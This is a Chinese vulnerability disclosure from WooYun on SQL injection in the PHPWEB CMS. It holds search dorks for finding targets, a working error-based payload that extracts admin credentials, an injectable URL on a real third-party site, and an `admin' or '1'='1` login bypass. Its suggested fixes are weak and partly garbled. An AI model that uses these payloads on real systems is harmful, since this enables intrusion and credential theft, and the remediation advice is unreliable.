当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034900

漏洞标题:PHPWEB多处SQL注入漏洞打包

相关厂商:PHPWEB

漏洞作者: 只发通用型

提交时间:2013-08-21 16:02

修复时间:2013-11-19 16:02

公开时间:2013-11-19 16:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

这套程序是付费的.网上找到的源码都是加密,没办法进行代码审计.
黑盒测试时顺便了解了一下这个CMS的历史
PHPWEB这个CMS的前身是MediSoft,后来改名为phpweb.
现在又有人拿这套系统去卖..

详细说明:

找这些网站的关键词
inurl:/class/?1.html
inurl:class/index.php?catid=0
inurl:/page/html/?1.html
一共三个注入点
1. ?数字.htm
第二和第三个要在magic_quotes_gpc=off 或者PHP5.3以上才能使用
2.
第一个注入,用官网的demo

http://demo.8555.net/3149_4369/product/html/?78'and(select/**/1/**/from(select/**/count(*),concat((select/**/(select/**/(select/**/concat(0x27,0x7e,user,0x27,0x7e,password,0x27,0x7e)/**/from/**/dev_base_admin/**/limit/**/0,1))/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/*.html


1.jpg


第二、第三个注入,官网demo的magic_quotes_gpc开了.没用官方demo演示,随便百度个站
拼接方式太蛋疼,.木有写出POC。有兴趣的自己研究下

http://www.jlczzy.com/search/index.php?imageField.x=-1138&imageField.y=-319&key=1%27


2.jpg


第三个注入
/admin.php
账号密码admin' or '1'='1

3.jpg

漏洞证明:

1.jpg


2.jpg


3.jpg


修复方案:

1.在代码中加入
if (get_magic_quotes_gpc() ){
$id = intval ($id);
}
2.
$key = addslashes($_GET['key']);
3.
$_POST['user'] = addslashes($_POST['user']);
$_POST['passwrod'] = addslashes($_POST['passwrod']);

版权声明:转载请注明来源 只发通用型@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2013-08-21 19:37 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @只发通用型 加油

  2. 2013-11-15 01:53 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    支持